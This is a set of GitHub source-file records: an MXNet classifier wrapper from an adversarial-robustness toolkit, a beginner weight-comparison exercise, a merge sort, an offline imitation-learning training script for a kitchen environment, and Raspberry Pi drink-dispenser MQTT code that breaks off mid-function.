art.defences.preprocessor import Preprocessor\n from art.defences.postprocessor import Postprocessor\n\nlogger = logging.getLogger(__name__)\n\n\nclass MXClassifier(ClassGradientsMixin, ClassifierMixin, MXEstimator):\n \"\"\"\n Class for importing MXNet Gluon models.\n \"\"\"\n\n estimator_params = (\n MXEstimator.estimator_params\n + ClassifierMixin.estimator_params\n + [\n \"loss\",\n \"input_shape\",\n \"nb_classes\",\n \"optimizer\",\n \"ctx\",\n \"channels_first\",\n ]\n )\n\n def __init__(\n self,\n model: \"mx.gluon.Block\",\n loss: Union[\"mx.nd.loss\", \"mx.gluon.loss\"],\n input_shape: Tuple[int, ...],\n nb_classes: int,\n optimizer: Optional[\"mx.gluon.Trainer\"] = None,\n ctx: Optional[\"mx.context.Context\"] = None,\n channels_first: bool = True,\n clip_values: Optional[\"CLIP_VALUES_TYPE\"] = None,\n preprocessing_defences: Union[\"Preprocessor\", List[\"Preprocessor\"], None] = None,\n postprocessing_defences: Union[\"Postprocessor\", List[\"Postprocessor\"], None] = None,\n preprocessing: \"PREPROCESSING_TYPE\" = (0.0, 1.0),\n ) -> None:\n \"\"\"\n Initialize an `MXClassifier` object. Assumes the `model` passed as parameter is a Gluon model.\n\n :param model: The Gluon model. The output of the model can be logits, probabilities or anything else. Logits\n output should be preferred where possible to ensure attack efficiency.\n :param loss: The loss function for which to compute gradients for training.\n :param input_shape: The shape of one input instance.\n :param nb_classes: The number of classes of the model.\n :param optimizer: The optimizer used to train the classifier. This parameter is only required if fitting will\n be done with method fit.\n :param ctx: The device on which the model runs (CPU or GPU). If not provided, CPU is assumed.\n :param channels_first: Set channels first or last.\n :param clip_values: Tuple of the form `(min, max)` of floats or `np.ndarray` representing the minimum and\n maximum values allowed for features. If floats are provided, these will be used as the range of all\n features. 
If arrays are provided, each value will be considered the bound for a feature, thus\n the shape of clip values needs to match the total number of features.\n :param preprocessing_defences: Preprocessing defence(s) to be applied by the classifier.\n :param postprocessing_defences: Postprocessing defence(s) to be applied by the classifier.\n :param preprocessing: Tuple of the form `(subtrahend, divisor)` of floats or `np.ndarray` of values to be\n used for data preprocessing. The first value will be subtracted from the input. The input will then\n be divided by the second one.\n \"\"\"\n import mxnet as mx\n\n super().__init__(\n model=model,\n clip_values=clip_values,\n channels_first=channels_first,\n preprocessing_defences=preprocessing_defences,\n postprocessing_defences=postprocessing_defences,\n preprocessing=preprocessing,\n )\n\n self._loss = loss\n self.nb_classes = nb_classes\n self._input_shape = input_shape\n self._device = ctx\n self._optimizer = optimizer\n\n if ctx is None:\n self._ctx = mx.cpu()\n else:\n self._ctx = ctx\n\n # Get the internal layer\n self._layer_names = self._get_layers()\n\n @property\n def input_shape(self) -> Tuple[int, ...]:\n \"\"\"\n Return the shape of one input sample.\n\n :return: Shape of one input sample.\n \"\"\"\n return self._input_shape # type: ignore\n\n @property\n def loss(self) -> Union[\"mx.nd.loss\", \"mx.gluon.loss\"]:\n \"\"\"\n Return the loss function.\n\n :return: The loss function.\n \"\"\"\n return self._loss # type: ignore\n\n @property\n def optimizer(self) -> \"mx.gluon.Trainer\":\n \"\"\"\n Return the optimizer used to train the classifier.\n\n :return: The optimizer used to train the classifier.\n \"\"\"\n return self._optimizer # type: ignore\n\n @property\n def ctx(self) -> \"mx.context.Context\":\n \"\"\"\n Return the device on which the model runs.\n\n :return: The device on which the model runs (CPU or GPU).\n \"\"\"\n return self._ctx # type: ignore\n\n def fit(\n self, x: np.ndarray, y: np.ndarray, batch_size: int = 128, nb_epochs: int = 20, **kwargs\n ) -> None: # pragma: no cover\n \"\"\"\n Fit the classifier on the training set `(inputs, outputs)`.\n\n :param x: Training data.\n :param y: Target values (class labels) one-hot-encoded of shape (nb_samples, nb_classes) or index labels of\n shape (nb_samples,).\n :param batch_size: Size of batches.\n :param nb_epochs: Number of epochs to use for training.\n :param kwargs: Dictionary of framework-specific arguments. 
This parameter is not currently supported for MXNet\n and providing it takes no effect.\n \"\"\"\n import mxnet as mx\n\n if self.optimizer is None:\n raise ValueError(\"An MXNet optimizer is required for fitting the model.\")\n\n training_mode = True\n\n y = check_and_transform_label_format(y, nb_classes=self.nb_classes)\n\n # Apply preprocessing\n x_preprocessed, y_preprocessed = self._apply_preprocessing(x, y, fit=True)\n y_preprocessed = np.argmax(y_preprocessed, axis=1)\n nb_batch = int(np.ceil(len(x_preprocessed) / batch_size))\n ind = np.arange(len(x_preprocessed))\n\n for _ in range(nb_epochs):\n # Shuffle the examples\n np.random.shuffle(ind)\n\n # Train for one epoch\n for m in range(nb_batch):\n x_batch = mx.nd.array(\n x_preprocessed[ind[m * batch_size : (m + 1) * batch_size]].astype(config.ART_NUMPY_DTYPE)\n ).as_in_context(self.ctx)\n y_batch = mx.nd.array(y_preprocessed[ind[m * batch_size : (m + 1) * batch_size]]).as_in_context(\n self.ctx\n )\n\n with mx.autograd.record(train_mode=training_mode):\n # Perform prediction\n preds = self._model(x_batch)\n\n # Apply postprocessing\n preds = self._apply_postprocessing(preds=preds, fit=True)\n\n # Form the loss function\n loss = self.loss(preds, y_batch)\n\n loss.backward()\n\n # Update parameters\n self.optimizer.step(batch_size)\n\n def fit_generator(self, generator: \"DataGenerator\", nb_epochs: int = 20, **kwargs) -> None: # pragma: no cover\n \"\"\"\n Fit the classifier using the generator that yields batches as specified.\n\n :param generator: Batch generator providing `(x, y)` for each epoch.\n :param nb_epochs: Number of epochs to use for training.\n :param kwargs: Dictionary of framework-specific arguments. This parameter is not currently supported for MXNet\n and providing it takes no effect.\n \"\"\"\n import mxnet as mx\n from art.data_generators import MXDataGenerator\n\n if self.optimizer is None:\n raise ValueError(\"An MXNet optimizer is required for fitting the model.\")\n\n training_mode = True\n\n if (\n isinstance(generator, MXDataGenerator)\n and (self.preprocessing_defences is None or self.preprocessing_defences == [])\n and self.preprocessing == (0, 1)\n ):\n # Train directly in MXNet\n for _ in range(nb_epochs):\n for x_batch, y_batch in generator.iterator:\n x_batch = mx.nd.array(x_batch.astype(config.ART_NUMPY_DTYPE)).as_in_context(self.ctx)\n y_batch = mx.nd.argmax(y_batch, axis=1)\n y_batch = mx.nd.array(y_batch).as_in_context(self.ctx)\n\n with mx.autograd.record(train_mode=training_mode):\n # Perform prediction\n preds = self._model(x_batch)\n\n # Form the loss function\n loss = self.loss(preds, y_batch)\n\n loss.backward()\n\n # Update parameters\n self.optimizer.step(x_batch.shape[0])\n else:\n # Fit a generic data generator through the API\n super().fit_generator(generator, nb_epochs=nb_epochs)\n\n def predict( # pylint: disable=W0221\n self, x: np.ndarray, batch_size: int = 128, training_mode: bool = False, **kwargs\n ) -> np.ndarray:\n \"\"\"\n Perform prediction for a batch of inputs.\n\n :param x: Input samples.\n :param batch_size: Size of batches.\n :param training_mode: `True` for model set to training mode and `False` for model set to evaluation mode.\n :return: Array of predictions of shape `(nb_inputs, nb_classes)`.\n \"\"\"\n import mxnet as mx\n\n # Apply preprocessing\n x_preprocessed, _ = self._apply_preprocessing(x, y=None, fit=False)\n\n # Run prediction with batch processing\n results = np.zeros((x_preprocessed.shape[0], self.nb_classes), dtype=np.float32)\n num_batch = 
int(np.ceil(len(x_preprocessed) / float(batch_size)))\n for m in range(num_batch):\n # Batch indexes\n begin, end = (\n m * batch_size,\n min((m + 1) * batch_size, x_preprocessed.shape[0]),\n )\n\n # Predict\n x_batch = mx.nd.array(x_preprocessed[begin:end].astype(config.ART_NUMPY_DTYPE), ctx=self.ctx)\n x_batch.attach_grad()\n with mx.autograd.record(train_mode=training_mode):\n preds = self._model(x_batch)\n\n results[begin:end] = preds.asnumpy()\n\n # Apply postprocessing\n predictions = self._apply_postprocessing(preds=results, fit=False)\n\n return predictions\n\n def class_gradient( # pylint: disable=W0221\n self,\n x: np.ndarray,\n label: Optional[Union[int, List[int], np.ndarray]] = None,\n training_mode: bool = False,\n **kwargs,\n ) -> np.ndarray:\n \"\"\"\n Compute per-class derivatives w.r.t. `x`.\n\n :param x: Sample input with shape as expected by the model.\n :param label: Index of a specific per-class derivative. If an integer is provided, the gradient of that class\n output is computed for all samples. If multiple values as provided, the first dimension should\n match the batch size of `x`, and each value will be used as target for its corresponding sample in\n `x`. If `None`, then gradients for all classes will be computed for each sample.\n :param training_mode: `True` for model set to training mode and `'False` for model set to evaluation mode.\n :return: Array of gradients of input features w.r.t. each class in the form\n `(batch_size, nb_classes, input_shape)` when computing for all classes, otherwise shape becomes\n `(batch_size, 1, input_shape)` when `label` parameter is specified.\n \"\"\"\n import mxnet as mx\n\n # Check value of label for computing gradients\n if not ( # pragma: no cover\n label is None\n or (isinstance(label, int) and label in range(self.nb_classes))\n or (\n isinstance(label, np.ndarray)\n and len(label.shape) == 1\n and (label < self.nb_classes).all()\n and label.shape[0] == x.shape[0]\n )\n ):\n raise ValueError(f\"Label {label} is out of range.\")\n\n # Apply preprocessing\n x_preprocessed, _ = self._apply_preprocessing(x, y=None, fit=False)\n x_preprocessed = mx.nd.array(x_preprocessed.astype(config.ART_NUMPY_DTYPE), ctx=self.ctx)\n x_preprocessed.attach_grad()\n\n if label is None:\n with mx.autograd.record(train_mode=False):\n preds = self._model(x_preprocessed)\n class_slices = [preds[:, i] for i in range(self.nb_classes)]\n\n grads_list = []\n for slice_ in class_slices:\n slice_.backward(retain_graph=True)\n grad = x_preprocessed.grad.asnumpy()\n grads_list.append(grad)\n grads = np.swapaxes(np.array(grads_list), 0, 1)\n elif isinstance(label, int):\n with mx.autograd.record(train_mode=training_mode):\n preds = self._model(x_preprocessed)\n class_slice = preds[:, label]\n\n class_slice.backward()\n grads = np.expand_dims(x_preprocessed.grad.asnumpy(), axis=1)\n else:\n unique_labels = list(np.unique(label))\n\n with mx.autograd.record(train_mode=training_mode):\n preds = self._model(x_preprocessed)\n class_slices = [preds[:, i] for i in unique_labels]\n\n grads_list = []\n for slice_ in class_slices:\n slice_.backward(retain_graph=True)\n grad = x_preprocessed.grad.asnumpy()\n grads_list.append(grad)\n\n grads = np.swapaxes(np.array(grads_list), 0, 1)\n lst = [unique_labels.index(i) for i in label]\n grads = grads[np.arange(len(grads)), lst]\n grads = np.expand_dims(grads, axis=1)\n\n grads = self._apply_preprocessing_gradient(x, grads)\n\n return grads\n\n def loss_gradient( # pylint: disable=W0221\n self, x: np.ndarray, y: 
np.ndarray, training_mode: bool = False, **kwargs\n ) -> np.ndarray:\n \"\"\"\n Compute the gradient of the loss function w.r.t. `x`.\n\n :param x: Sample input with shape as expected by the model.\n :param y: Target values (class labels) one-hot-encoded of shape `(nb_samples, nb_classes)` or indices of shape\n `(nb_samples,)`.\n :param training_mode: `True` for model set to training mode and `'False` for model set to evaluation mode.\n :return: Array of gradients of the same shape as `x`.\n \"\"\"\n import mxnet as mx\n\n # Apply preprocessing\n x_preprocessed, y_preprocessed = self._apply_preprocessing(x, y, fit=False)\n y_preprocessed = mx.nd.array([np.argmax(y_preprocessed, axis=1)], ctx=self.ctx).T\n x_preprocessed = mx.nd.array(x_preprocessed.astype(config.ART_NUMPY_DTYPE), ctx=self.ctx)\n x_preprocessed.attach_grad()\n\n with mx.autograd.record(train_mode=training_mode):\n preds = self._model(x_preprocessed)\n loss = self.loss(preds, y_preprocessed)\n\n loss.backward()\n\n # Compute gradients\n grads = x_preprocessed.grad.asnumpy()\n grads = self._apply_preprocessing_gradient(x, grads)\n assert grads.shape == x.shape\n\n return grads\n\n def compute_loss(self, x: np.ndarray, y: np.ndarray, **kwargs) -> np.ndarray:\n \"\"\"\n Compute the loss of the neural network for samples `x`.\n\n :param x: Samples of shape (nb_samples, nb_features) or (nb_samples, nb_pixels_1, nb_pixels_2,\n nb_channels) or (nb_samples, nb_channels, nb_pixels_1, nb_pixels_2).\n :param y: Target values (class labels) one-hot-encoded of shape `(nb_samples, nb_classes)` or indices\n of shape `(nb_samples,)`.\n :return: Loss values.\n :rtype: Format as expected by the `model`\n \"\"\"\n raise NotImplementedError\n\n @property\n def layer_names(self) -> List[str]:\n \"\"\"\n Return the hidden layers in the model, if applicable.\n\n :return: The hidden layers in the model, input and output layers excluded.\n\n .. warning:: `layer_names` tries to infer the internal structure of the model.\n This feature comes with no guarantees on the correctness of the result.\n The intended order of the layers tries to match their order in the model, but this is not\n guaranteed either.\n \"\"\"\n return self._layer_names\n\n def get_activations(\n self, x: np.ndarray, layer: Union[int, str], batch_size: int = 128, framework: bool = False\n ) -> np.ndarray: # pragma: no cover\n \"\"\"\n Return the output of the specified layer for input `x`. `layer` is specified by layer index (between 0 and\n `nb_layers - 1`) or by name. 
The number of layers can be determined by counting the results returned by\n calling `layer_names`.\n\n :param x: Input for computing the activations.\n :param layer: Layer for computing the activations\n :param batch_size: Size of batches.\n :param framework: If true, return the intermediate tensor representation of the activation.\n :return: The output of `layer`, where the first dimension is the batch size corresponding to `x`.\n \"\"\"\n import mxnet as mx\n\n if isinstance(layer, six.string_types):\n if layer not in self._layer_names:\n raise ValueError(f\"Layer name {layer} is not part of the model.\")\n layer_ind = self._layer_names.index(layer)\n elif isinstance(layer, int):\n if layer < 0 or layer >= len(self._layer_names):\n raise ValueError(\n f\"Layer index {layer} is outside of range (0 to {len(self._layer_names) - 1} included).\"\n )\n layer_ind = layer\n else:\n raise TypeError(\"Layer must be of type `str` or `int`.\")\n\n # Apply preprocessing and defences\n if x.shape == self.input_shape:\n x_expanded = np.expand_dims(x, 0)\n else:\n x_expanded = x\n\n x_preprocessed, _ = self._apply_preprocessing(x=x_expanded, y=None, fit=False)\n\n if framework:\n return self._model[layer_ind]\n\n # Compute activations with batching\n activations = []\n nb_batches = int(np.ceil(len(x_preprocessed) / float(batch_size)))\n for batch_index in range(nb_batches):\n # Batch indexes\n begin, end = (\n batch_index * batch_size,\n min((batch_index + 1) * batch_size, x_preprocessed.shape[0]),\n )\n\n # Predict\n x_batch = mx.nd.array(x_preprocessed[begin:end].astype(config.ART_NUMPY_DTYPE), ctx=self.ctx)\n x_batch.attach_grad()\n with mx.autograd.record(train_mode=False):\n preds = self._model[layer_ind](x_batch)\n\n activations.append(preds.asnumpy())\n\n activations_array = np.vstack(activations)\n return activations_array\n\n def save(self, filename: str, path: Optional[str] = None) -> None:\n \"\"\"\n Save a model to file in the format specific to the backend framework. For Gluon, only parameters are saved in\n file with name `.params` at the specified path. To load the saved model, the original model code needs\n to be run before calling `load_parameters` on the generated Gluon model.\n\n :param filename: Name of the file where to store the model.\n :param path: Path of the folder where to store the model. If no path is specified, the model will be stored in\n the default data location of the library `ART_DATA_PATH`.\n \"\"\"\n if path is None:\n full_path = os.path.join(config.ART_DATA_PATH, filename)\n else:\n full_path = os.path.join(path, filename)\n folder = os.path.split(full_path)[0]\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n self._model.save_parameters(full_path + \".params\")\n logger.info(\"Model parameters saved in path: %s.params.\", full_path)\n\n def clone_for_refitting(self) -> \"MXClassifier\":\n \"\"\"\n Clone classifier for refitting.\n \"\"\"\n raise NotImplementedError\n\n def __repr__(self):\n repr_ = (\n f\"{self.__module__ + '.' 
+ self.__class__.__name__}(model={self._model}, loss={self.loss},\"\n f\" input_shape={self.input_shape}, nb_classes={self.nb_classes}, optimizer={self.optimizer},\"\n f\" ctx={self.ctx}, channels_first={self.channels_first}, clip_values={self.clip_values!r},\"\n f\" preprocessing_defences={self.preprocessing_defences}, postprocessing_defences={self.postprocessing_defences},\"\n f\" preprocessing={self.preprocessing})\"\n )\n\n return repr_\n\n def _get_layers(self) -> list:\n \"\"\"\n Return the hidden layers in the model, if applicable.\n\n :return: The hidden layers in the model, input and output layers excluded.\n \"\"\"\n import mxnet\n\n if isinstance(self._model, mxnet.gluon.nn.Sequential):\n layer_names = [layer.name for layer in self._model[:-1]]\n logger.info(\"Inferred %i hidden layers on MXNet classifier.\", len(layer_names))\n else:\n layer_names = []\n\n return layer_names\n","repo_name":"Trusted-AI/adversarial-robustness-toolbox","sub_path":"art/estimators/classification/mxnet.py","file_name":"mxnet.py","file_ext":"py","file_size_in_byte":21871,"program_lang":"python","lang":"en","doc_type":"code","stars":4138,"dataset":"github-code","pt":"66"} +{"seq_id":"74052128529","text":"maior = 0\nmenor = 0\nfor p in range(1, 6):\n    peso = int(input(f'Enter the weight of person #{p}: '))\n    if p == 1:\n        maior = peso\n        menor = peso\n    else:\n        if peso > maior:\n            maior = peso\n        if peso < menor:\n            menor = peso\nprint(f'The highest weight read was {maior}kg '\n      f'\nand the lowest weight read was {menor}kg')","repo_name":"icarovnc/estudo-python","sub_path":"De 51 a 100/ex055.py","file_name":"ex055.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14799663448","text":"import numpy as np\n\nclass MergeSort:\n    def __init__(self, data):\n        self.data = data\n\n    def sort(self):\n        self.data = mergeSort(self.data)\n\ndef mergeSort(data):\n    if len(data) > 1:\n        mid = len(data)//2\n\n        left = data[:mid]\n        right = data[mid:]\n\n        mergeSort(left)\n        mergeSort(right)\n\n        left_index = right_index = index = 0\n\n        while left_index < len(left) and right_index < len(right):\n            if left[left_index] <= right[right_index]:\n                data[index] = left[left_index]\n                left_index += 1\n            else:\n                data[index] = right[right_index]\n                right_index += 1\n            index += 1\n \n        while left_index < len(left):\n            data[index] = left[left_index]\n            left_index += 1\n            index += 1\n\n        while right_index < len(right):\n            data[index] = right[right_index]\n            right_index += 1\n            index += 1\n\n    return data\n\n\n\nif __name__ == \"__main__\":\n    data_random = np.random.randint(10, size=(10)).tolist()\n    MS = MergeSort(data_random)\n    MS.sort()","repo_name":"mrjrozycki/Sorting-Algorithms","sub_path":"mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10777559242","text":"import os\nimport time\n\nimport d4rl\nimport gym\nimport matplotlib.pyplot as plt \nimport numpy as np\nfrom PIL import Image \n\nimport torch\nfrom tqdm import tqdm\nimport wandb \n\nimport envs \nimport utils\nfrom smodice_pytorch import SMODICE\nfrom rce_pytorch import RCE_TD3_BC\nfrom oril_pytorch import ORIL \nfrom discriminator_pytorch import Discriminator_SA\n\nnp.set_printoptions(precision=3, suppress=True)\n\n\ndef run(config):\n    # load offline dataset \n    env = gym.make(f\"{config['env_name']}-mixed-v0\")\n    dataset = env.get_dataset()\n\n    # Load the custom kitchen environment that 
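exposes a get_example() helper and 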
gets the success examples\n evaluation_env = gym.make(f\"{config['env_name']}-{config['dataset']}-v0\")\n expert_obs = evaluation_env.get_example(dataset, num_expert_obs=500)\n expert_traj = {'observations': expert_obs}\n \n np.random.seed(config['seed'])\n torch.manual_seed(config['seed'])\n env.seed(config['seed'])\n evaluation_env.seed(config['seed'])\n\n initial_obs_dataset, dataset, dataset_statistics = utils.dice_dataset(env, standardize_observation=config['standardize_obs'], absorbing_state=config['absorbing_state'], standardize_reward=config['standardize_reward'])\n\n # Normalize expert observations and potentially add absorbing state\n if config['standardize_obs']:\n expert_obs_dim = expert_traj['observations'].shape[1]\n expert_traj['observations'] = (expert_traj['observations'] - dataset_statistics['observation_mean'][:expert_obs_dim]) / (dataset_statistics['observation_std'][:expert_obs_dim] + 1e-10)\n if 'next_observations' in expert_traj:\n expert_traj['next_observations'] = (expert_traj['next_observations'] - dataset_statistics['observation_mean']) / (dataset_statistics['observation_std'] + 1e-10)\n if config['absorbing_state'] and 'terminal' in expert_traj:\n expert_traj = utils.add_absorbing_state(expert_traj)\n if config['use_policy_entropy_constraint'] or config['use_data_policy_entropy_constraint']:\n if config['target_entropy'] is None:\n config['target_entropy'] = -np.prod(env.action_space.shape)\n\n # Create inputs for the discriminator\n state_dim = dataset_statistics['observation_dim'] + 1 if config['absorbing_state'] else dataset_statistics['observation_dim']\n action_dim = 0 if config['state'] else dataset_statistics['action_dim']\n disc_cutoff = state_dim \n\n expert_input = expert_traj['observations'][:, :disc_cutoff]\n offline_input = dataset['observations'][:, :disc_cutoff]\n\n discriminator = Discriminator_SA(disc_cutoff, action_dim, hidden_dim=config['hidden_sizes'][0], device=config['device'])\n\n # Train discriminator\n if config['disc_type'] == 'learned':\n dataset_expert = torch.utils.data.TensorDataset(torch.FloatTensor(expert_input)) \n expert_loader = torch.utils.data.DataLoader(dataset_expert, batch_size=256, shuffle=True, pin_memory=True)\n dataset_offline = torch.utils.data.TensorDataset(torch.FloatTensor(offline_input))\n offline_loader = torch.utils.data.DataLoader(dataset_offline, batch_size=256, shuffle=True, pin_memory=True)\n\n # Train discriminator\n print(\"Train Discriminator\")\n for i in tqdm(range(config['disc_iterations'])):\n loss = discriminator.update(expert_loader, offline_loader)\n\n\n def _sample_minibatch(batch_size, reward_scale):\n initial_indices = np.random.randint(0, dataset_statistics['N_initial_observations'], batch_size)\n indices = np.random.randint(0, dataset_statistics['N'], batch_size)\n sampled_dataset = (\n initial_obs_dataset['initial_observations'][initial_indices],\n dataset['observations'][indices],\n dataset['actions'][indices],\n dataset['rewards'][indices] * reward_scale,\n dataset['next_observations'][indices],\n dataset['terminals'][indices]\n )\n return tuple(map(torch.from_numpy, sampled_dataset))\n\n def _evaluate(env, agent, dataset_statistics, absorbing_state=True, num_evaluation=10, normalize=False, make_gif=False, iteration=0, max_steps=None, run_name=''):\n normalized_scores = []\n if max_steps is None:\n max_steps = env._max_episode_steps\n imgs = []\n for eval_iter in range(num_evaluation):\n start_time = time.time()\n obs = env.reset()\n episode_reward = 0\n for t in tqdm(range(max_steps), 
ncols=70, desc='evaluate', ascii=True, disable=os.environ.get(\"DISABLE_TQDM\", False)):\n                if absorbing_state:\n                    obs_standardized = np.append((obs - dataset_statistics['observation_mean']) / (dataset_statistics['observation_std'] + 1e-10), 0)\n                else:\n                    obs_standardized = (obs - dataset_statistics['observation_mean']) / (dataset_statistics['observation_std'] + 1e-10)\n\n                actions = agent.step((np.array([obs_standardized])).astype(np.float32))\n                action = actions[0][0].numpy()\n                \n                # prevent NAN\n                action = np.clip(action, env.action_space.low, env.action_space.high)\n                next_obs, reward, done, info = env.step(action)\n                \n                # only care about the specified task\n                if config['dataset'] in info['rewards']['removed']:\n                    reward = 1.0\n                    done = True\n                else:\n                    reward = 0.0 \n                    done = False \n\n                if make_gif and eval_iter == 0:\n                    img = env.render(mode=\"rgb_array\")\n                    imgs.append(Image.fromarray(img))\n                episode_reward += reward\n                if done:\n                    break\n                obs = next_obs\n            if normalize:\n                normalized_score = 100 * (episode_reward - d4rl.infos.REF_MIN_SCORE[env.spec.id]) / (d4rl.infos.REF_MAX_SCORE[env.spec.id] - d4rl.infos.REF_MIN_SCORE[env.spec.id])\n            else:\n                normalized_score = episode_reward\n            print(f'normalized_score: {normalized_score} (elapsed_time={time.time() - start_time:.3f}) ')\n            normalized_scores.append(normalized_score)\n\n        if make_gif:\n            imgs[0].save(f\"policy_gifs/{run_name}-iter{iteration}.gif\", save_all=True,\n                    append_images=imgs[1:], duration=60, loop=0)\n        return np.mean(normalized_scores)\n\n    if 'dice' in config['algo_type']:\n        agent = SMODICE(dataset_statistics['observation_dim'] + 1 if config['absorbing_state'] else dataset_statistics['observation_dim'],\n            dataset_statistics['action_dim'], config=config\n        )\n    elif 'rce' in config['algo_type']:\n        state_dim = dataset_statistics['observation_dim'] + 1 if config['absorbing_state'] else dataset_statistics['observation_dim']\n        action_dim = dataset_statistics['action_dim']\n        max_action = env.action_space.high[0]\n        agent = RCE_TD3_BC(state_dim, action_dim, max_action)\n    elif 'oril' in config['algo_type']:\n        state_dim = dataset_statistics['observation_dim'] + 1 if config['absorbing_state'] else dataset_statistics['observation_dim']\n        action_dim = dataset_statistics['action_dim']\n        max_action = env.action_space.high[0]\n        agent = ORIL(state_dim, action_dim, max_action)\n    else:\n        raise NotImplementedError\n\n    result_logs = []\n    start_iteration = 0\n\n    # Start training\n    start_time = time.time()\n    last_start_time = time.time()\n    for iteration in tqdm(range(start_iteration, config['total_iterations'] + 1), ncols=70, desc='DICE', initial=start_iteration, total=config['total_iterations'] + 1, ascii=True, disable=os.environ.get(\"DISABLE_TQDM\", False)):\n        # Sample mini-batch data from dataset\n        initial_observation, observation, action, reward, next_observation, terminal = _sample_minibatch(config['batch_size'], config['reward_scale'])\n\n        # Sample success states for RCE\n        if config['algo_type'] == 'rce':\n            success_indices = np.random.randint(0, expert_traj['observations'].shape[0], config['batch_size'])\n            success_state = torch.from_numpy(expert_traj['observations'][success_indices])\n            initial_observation = success_state\n\n        # Compute discriminator based reward (SMODICE, ORIL)\n        with torch.no_grad():\n            obs_for_disc = torch.from_numpy(np.array(observation)).to(discriminator.device)\n            if config['state']:\n                disc_input = obs_for_disc\n            else:\n                act_for_disc = torch.from_numpy(np.array(action)).to(discriminator.device)\n                disc_input = 
torch.cat([obs_for_disc, act_for_disc], axis=1)\n reward = discriminator.predict_reward(disc_input)\n\n # Perform gradient descent\n train_result = agent.train_step(initial_observation, observation, action, reward, next_observation, terminal)\n \n # Evaluation\n if iteration % config['log_iterations'] == 0:\n train_result = {k: v.detach().cpu().numpy() for k, v in train_result.items()}\n # evaluation via real-env rollout\n eval = _evaluate(env, agent, dataset_statistics, absorbing_state=config['absorbing_state'],\n normalize=False, num_evaluation=10, max_steps=280)\n train_result.update({'iteration': iteration, 'eval': eval})\n\n train_result.update({'iter_per_sec': config['log_iterations'] / (time.time() - last_start_time)})\n if 'w_e' in train_result:\n train_result.update({'w_e': train_result['w_e'].mean()})\n result_logs.append({'log': train_result, 'step': iteration})\n if not int(os.environ.get('DISABLE_STDOUT', 0)):\n print(f'=======================================================')\n # for k, v in sorted(train_result.items()):\n # print(f'- {k:23s}:{v:15.10f}')\n if train_result.get('eval'):\n print(f'- {\"eval\":23s}:{train_result[\"eval\"]:15.10f}')\n print(f'iteration={iteration} (elapsed_time={time.time() - start_time:.2f}s, {train_result[\"iter_per_sec\"]:.2f}it/s)')\n print(f'=======================================================', flush=True)\n\n last_start_time = time.time()\n \n\nif __name__ == \"__main__\":\n from configs.oil_examples_kitchen_default import get_parser\n args = get_parser().parse_args()\n run(vars(args))","repo_name":"JasonMa2016/SMODICE","sub_path":"run_oil_examples_kitchen.py","file_name":"run_oil_examples_kitchen.py","file_ext":"py","file_size_in_byte":10528,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"66"} +{"seq_id":"70539364370","text":"import time\nimport RPi.GPIO as GPIO\nimport paho.mqtt.client as mqtt\nimport paho.mqtt.publish as publish\n\n# MQTT implemented - two soc's communicating\n# can control the water pump\n# ultrasonic sensor readings feeded to the website - not yet\n# pressure sensor readings feeded to the website - not yet\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\n# water pump\npin = 21\n\n# ultrasonic sensor\n#LED = 18\nTRIG = 23\nECHO = 24\n\n# ultrasonic sensor 2\nTRIG2 = 17\nECHO2 = 27\n\n# led indicators\nred = 6\nblue = 13\ngreen = 19\nyellow = 26\n\nGPIO.setup(yellow, GPIO.OUT, initial=GPIO.LOW)\nGPIO.setup(green, GPIO.OUT, initial=GPIO.LOW)\nGPIO.setup(blue, GPIO.OUT, initial=GPIO.LOW)\nGPIO.setup(red, GPIO.OUT, initial=GPIO.LOW)\nGPIO.setup(TRIG,GPIO.OUT)\nGPIO.setup(ECHO,GPIO.IN)\nGPIO.setup(TRIG2,GPIO.OUT)\nGPIO.setup(ECHO2,GPIO.IN)\nGPIO.setup(pin,GPIO.OUT)\n\nGPIO.output(pin, True)\nGPIO.output(yellow, GPIO.LOW)\nGPIO.output(green, GPIO.LOW)\nGPIO.output(blue, GPIO.LOW)\nGPIO.output(red, GPIO.LOW)\n\nrefreshTime = 0.2 #0.25\n\ndef turnOn(delay):\n GPIO.output(pin, False)\n print(\"pump on for \"+str(delay)+\" seconds\")\n GPIO.output(blue, GPIO.HIGH)\n time.sleep(delay)\n GPIO.output(pin, True)\n print(\"pump off\")\n GPIO.output(blue, GPIO.LOW)\n readLevel(3)\n \ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n readLevel(3)\n client.subscribe(\"pub/pump-1\")\n #checkCup(3)\n\ndef on_message(client, userdata, msg):\n #print(msg.topic+\" \"+str(msg.payload))\n txt = str(msg.payload)\n msgText = txt.split(\"'\")\n #print(msgText[1])\n\n # drink sizes\n if msgText[1] == \"s\":\n print(\"Received order : small 
drink\")\n if(checkLevel(3) == True):\n if(checkCup(3) == \"CORRECT\"):\n turnOn(1)\n else:\n print(\"Cup not placed correctly\")\n else:\n print(\"Error : tank empty\")\n elif msgText[1] == \"m\":\n print(\"Received order : medium drink\")\n if(checkLevel(3) == True):\n if(checkCup(3) == \"CORRECT\"):\n turnOn(1.8)\n else:\n print(\"Cup not placed correctly\")\n else:\n print(\"Error : tank empty\")\n elif msgText[1] == \"l\":\n print(\"Received order : large drink\")\n if(checkLevel(3) == True):\n if(checkCup(3) == \"CORRECT\"):\n turnOn(2.6)\n else:\n print(\"Cup not placed correctly\")\n else:\n print(\"Error : tank empty\")\n elif msgText[1] == \"readLevel\":\n print(\"Checking levels\")\n readLevel(2)\n\ndef checkLevel(delay):\n if(readLevel(delay) != \"EMPTY\"):\n return True\n else:\n return False\n #return True\n\ndef readLevel(delay):\n i = 0\n while i < delay:\n GPIO.output(TRIG, False)\n time.sleep(refreshTime)\n GPIO.output(TRIG, True)\n time.sleep(0.00001)\n GPIO.output(TRIG, False)\n\n while GPIO.input(ECHO)==0:\n pulse_start = time.time()\n\n while GPIO.input(ECHO)==1:\n pulse_end = time.time()\n\n pulse_duration = pulse_end - pulse_start\n distance = pulse_duration * 17150\n distance = round(distance, 1)\n print(distance)\n\n i += 1\n\n if(distance >= 1 and distance < 3.5):\n print(\"Drinks capacity : HIGH\")\n 